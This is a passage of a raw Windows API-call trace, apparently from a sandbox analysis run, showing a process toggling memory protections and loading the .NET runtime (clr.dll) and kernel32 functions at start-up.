0xffffffff [0059.926] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea68*=0x7567103c, NumberOfBytesToProtect=0x41ea6c, NewAccessProtection=0x20, OldAccessProtection=0x41eaa0 | out: BaseAddress=0x41ea68*=0x75671000, NumberOfBytesToProtect=0x41ea6c, OldAccessProtection=0x41eaa0*=0x4) returned 0x0 [0059.926] GetCurrentProcess () returned 0xffffffff [0059.926] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea68*=0x75671070, NumberOfBytesToProtect=0x41ea6c, NewAccessProtection=0x4, OldAccessProtection=0x41eaa0 | out: BaseAddress=0x41ea68*=0x75671000, NumberOfBytesToProtect=0x41ea6c, OldAccessProtection=0x41eaa0*=0x20) returned 0x0 [0059.926] GetCurrentProcess () returned 0xffffffff [0059.927] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea68*=0x75671070, NumberOfBytesToProtect=0x41ea6c, NewAccessProtection=0x20, OldAccessProtection=0x41eaa0 | out: BaseAddress=0x41ea68*=0x75671000, NumberOfBytesToProtect=0x41ea6c, OldAccessProtection=0x41eaa0*=0x4) returned 0x0 [0059.927] GetCurrentProcess () returned 0xffffffff [0059.927] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea68*=0x756710d0, NumberOfBytesToProtect=0x41ea6c, NewAccessProtection=0x4, OldAccessProtection=0x41eaa0 | out: BaseAddress=0x41ea68*=0x75671000, NumberOfBytesToProtect=0x41ea6c, OldAccessProtection=0x41eaa0*=0x20) returned 0x0 [0059.927] GetCurrentProcess () returned 0xffffffff [0059.927] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea68*=0x756710d0, NumberOfBytesToProtect=0x41ea6c, NewAccessProtection=0x20, OldAccessProtection=0x41eaa0 | out: BaseAddress=0x41ea68*=0x75671000, NumberOfBytesToProtect=0x41ea6c, OldAccessProtection=0x41eaa0*=0x4) returned 0x0 [0059.927] GetCurrentProcess () returned 0xffffffff [0059.927] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea68*=0x756710dc, NumberOfBytesToProtect=0x41ea6c, NewAccessProtection=0x4, OldAccessProtection=0x41eaa0 | out: BaseAddress=0x41ea68*=0x75671000, NumberOfBytesToProtect=0x41ea6c, OldAccessProtection=0x41eaa0*=0x20) returned 0x0 [0059.927] GetCurrentProcess () returned 0xffffffff [0059.927] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea68*=0x756710dc, NumberOfBytesToProtect=0x41ea6c, NewAccessProtection=0x20, OldAccessProtection=0x41eaa0 | out: BaseAddress=0x41ea68*=0x75671000, NumberOfBytesToProtect=0x41ea6c, OldAccessProtection=0x41eaa0*=0x4) returned 0x0 [0059.928] SysReAllocStringLen (in: pbstr=0x41ea8c*=0x0, psz="clr.dll", len=0x7 | out: pbstr=0x41ea8c*="clr.dll") returned 1 [0059.928] CharLowerBuffW (in: lpsz="clr.dll", cchLength=0x7 | out: lpsz="clr.dll") returned 0x7 [0059.928] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", hFile=0x0, dwFlags=0x22) returned 0x74a00002 [0061.097] GetLastError () returned 0x0 [0061.098] FreeLibrary (hLibModule=0x74a00002) returned 1 [0061.098] GetProcAddress (hModule=0x75670000, lpProcName="GetFileVersionInfoW") returned 0x756719f4 [0061.099] SysReAllocStringLen (in: pbstr=0x41ea74*=0x0, psz="clr.dll", len=0x7 | out: pbstr=0x41ea74*="clr.dll") returned 1 [0061.099] CharLowerBuffW (in: lpsz="clr.dll", cchLength=0x7 | out: lpsz="clr.dll") returned 0x7 [0061.099] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", hFile=0x0, dwFlags=0x22) returned 0x73ae0002 [0061.101] GetLastError () returned 0x0 [0061.102] FreeLibrary (hLibModule=0x73ae0002) returned 1 [0061.102] GetProcAddress (hModule=0x75670000, lpProcName="VerQueryValueW") returned 0x75671b51 [0061.103] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0x118 [0061.103] GetLastError () returned 0x0 [0061.103] SysReAllocStringLen (in: pbstr=0x41f184*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x41f184*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0061.103] GetThreadLocale () returned 0x409 [0061.103] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0061.103] GetThreadLocale () returned 0x409 [0061.103] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0061.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", nBufferLength=0x104, lpBuffer=0x41ef08, lpFilePart=0x41ef04 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", lpFilePart=0x41ef04*="clr.dll") returned 0x35 [0061.103] SysReAllocStringLen (in: pbstr=0x41f184*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x41f184*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0061.103] SysReAllocStringLen (in: pbstr=0x41f134*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x41f134*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0061.103] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", cchLength=0x35 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") returned 0x35 [0061.103] SysReAllocStringLen (in: pbstr=0x41f184*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x41f184*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") returned 1 [0061.104] SetLastError (dwErrCode=0x0) [0061.104] GetCurrentThreadId () returned 0xba4 [0061.104] ResetEvent (hEvent=0xb8) returned 1 [0061.104] GetCurrentThreadId () returned 0xba4 [0061.104] GetCurrentThreadId () returned 0xba4 [0061.104] GetCurrentThreadId () returned 0xba4 [0061.104] GetCurrentThreadId () returned 0xba4 [0061.104] ResetEvent (hEvent=0xb8) returned 1 [0061.104] GetCurrentThreadId () returned 0xba4 [0061.104] GetCurrentThreadId () returned 0xba4 [0061.104] SetEvent (hEvent=0xbc) returned 1 [0061.104] SetEvent (hEvent=0xb8) returned 1 [0061.104] CloseHandle (hObject=0x118) returned 1 [0061.107] SysReAllocStringLen (in: pbstr=0x41f4dc*=0x0, psz="clr.dll", len=0x7 | out: pbstr=0x41f4dc*="clr.dll") returned 1 [0061.107] CharLowerBuffW (in: lpsz="clr.dll", cchLength=0x7 | out: lpsz="clr.dll") returned 0x7 [0061.107] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", hFile=0x0, dwFlags=0x8) returned 0x74a00000 [0061.745] SysReAllocStringLen (in: pbstr=0x41f16c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41f16c*="kernel32.dll") returned 1 [0061.745] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0061.745] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0061.765] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0061.767] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0061.770] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0061.775] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0061.780] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0061.782] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0061.785] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0061.788] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0061.813] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0061.816] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0061.818] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0061.820] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0061.885] GetProcAddress (hModule=0x77710000, lpProcName="EventSetInformation") returned 0x0 [0061.885] FreeLibrary (hLibModule=0x77710000) returned 1 [0061.890] GetLastError () returned 0x7f [0061.890] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x75057018, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.890] GetCurrentProcess () returned 0xffffffff [0061.890] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x75057018, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.890] GetCurrentProcess () returned 0xffffffff [0061.890] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x75057030, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.891] GetCurrentProcess () returned 0xffffffff [0061.891] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x75057030, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.891] GetCurrentProcess () returned 0xffffffff [0061.891] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750570d0, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.891] GetCurrentProcess () returned 0xffffffff [0061.891] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750570d0, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.891] GetCurrentProcess () returned 0xffffffff [0061.891] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750570dc, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.892] GetCurrentProcess () returned 0xffffffff [0061.892] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750570dc, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.892] GetCurrentProcess () returned 0xffffffff [0061.892] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750570e0, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.892] GetCurrentProcess () returned 0xffffffff [0061.892] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750570e0, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.892] GetCurrentProcess () returned 0xffffffff [0061.892] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x7505710c, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.892] GetCurrentProcess () returned 0xffffffff [0061.892] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x7505710c, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.893] GetCurrentProcess () returned 0xffffffff [0061.893] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x75057124, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.893] GetCurrentProcess () returned 0xffffffff [0061.893] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x75057124, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.893] GetCurrentProcess () returned 0xffffffff [0061.893] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750571b4, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.893] GetCurrentProcess () returned 0xffffffff [0061.893] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750571b4, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.893] GetCurrentProcess () returned 0xffffffff [0061.893] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750571c4, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.894] GetCurrentProcess () returned 0xffffffff [0061.894] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750571c4, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.894] GetCurrentProcess () returned 0xffffffff [0061.894] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750571c8, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.894] GetCurrentProcess () returned 0xffffffff [0061.894] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750571c8, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.894] GetCurrentProcess () returned 0xffffffff [0061.894] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750571cc, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.895] GetCurrentProcess () returned 0xffffffff [0061.895] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750571cc, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.895] GetCurrentProcess () returned 0xffffffff [0061.895] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750571f4, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.895] GetCurrentProcess () returned 0xffffffff [0061.895] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750571f4, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.895] GetCurrentProcess () returned 0xffffffff [0061.895] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750571fc, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.895] GetCurrentProcess () returned 0xffffffff [0061.895] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750571fc, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.896] GetCurrentProcess () returned 0xffffffff [0061.896] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x75057220, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.896] GetCurrentProcess () returned 0xffffffff [0061.896] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x75057220, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.896] GetCurrentProcess () returned 0xffffffff [0061.896] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x75057294, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.896] GetCurrentProcess () returned 0xffffffff [0061.896] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x75057294, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.897] GetCurrentProcess () returned 0xffffffff [0061.897] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x7505729c, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.897] GetCurrentProcess () returned 0xffffffff [0061.897] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x7505729c, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.897] GetCurrentProcess () returned 0xffffffff [0061.897] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750572a4, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.897] GetCurrentProcess () returned 0xffffffff [0061.897] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750572a4, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.898] GetCurrentProcess () returned 0xffffffff [0061.898] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750572bc, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.898] GetCurrentProcess () returned 0xffffffff [0061.898] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750572bc, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.898] GetCurrentProcess () returned 0xffffffff [0061.898] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750572c0, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.898] GetCurrentProcess () returned 0xffffffff [0061.898] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750572c0, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.899] GetCurrentProcess () returned 0xffffffff [0061.899] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750572cc, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.899] GetCurrentProcess () returned 0xffffffff [0061.899] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750572cc, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.899] GetCurrentProcess () returned 0xffffffff [0061.899] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750572ec, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.900] GetCurrentProcess () returned 0xffffffff [0061.900] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x750572ec, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.900] GetCurrentProcess () returned 0xffffffff [0061.900] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x75057368, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.900] GetCurrentProcess () returned 0xffffffff [0061.900] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x75057368, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.900] GetCurrentProcess () returned 0xffffffff [0061.900] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x7505736c, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x4, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x2) returned 0x0 [0061.901] GetCurrentProcess () returned 0xffffffff [0061.901] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f4c4*=0x7505736c, NumberOfBytesToProtect=0x41f4c8, NewAccessProtection=0x2, OldAccessProtection=0x41f4fc | out: BaseAddress=0x41f4c4*=0x75057000, NumberOfBytesToProtect=0x41f4c8, OldAccessProtection=0x41f4fc*=0x4) returned 0x0 [0061.901] GetProcAddress (hModule=0x74a00000, lpProcName="SetRuntimeInfo") returned 0x74aae2aa [0061.907] GetProcAddress (hModule=0x74a00000, lpProcName="_CorExeMain") returned 0x74b0af29 [0061.923] SysReAllocStringLen (in: pbstr=0x41f4f4*=0x0, psz="api-ms-win-core-quirks-l1-1-0.dll", len=0x21 | out: pbstr=0x41f4f4*="api-ms-win-core-quirks-l1-1-0.dll") returned 1 [0061.923] CharLowerBuffW (in: lpsz="api-ms-win-core-quirks-l1-1-0.dll", cchLength=0x21 | out: lpsz="api-ms-win-core-quirks-l1-1-0.dll") returned 0x21 [0061.923] LoadLibraryExW (lpLibFileName="api-ms-win-core-quirks-l1-1-0.dll", hFile=0x0, dwFlags=0x800) returned 0x0 [0061.923] GetLastError () returned 0x57 [0061.923] SetLastError (dwErrCode=0x57) [0061.929] SysReAllocStringLen (in: 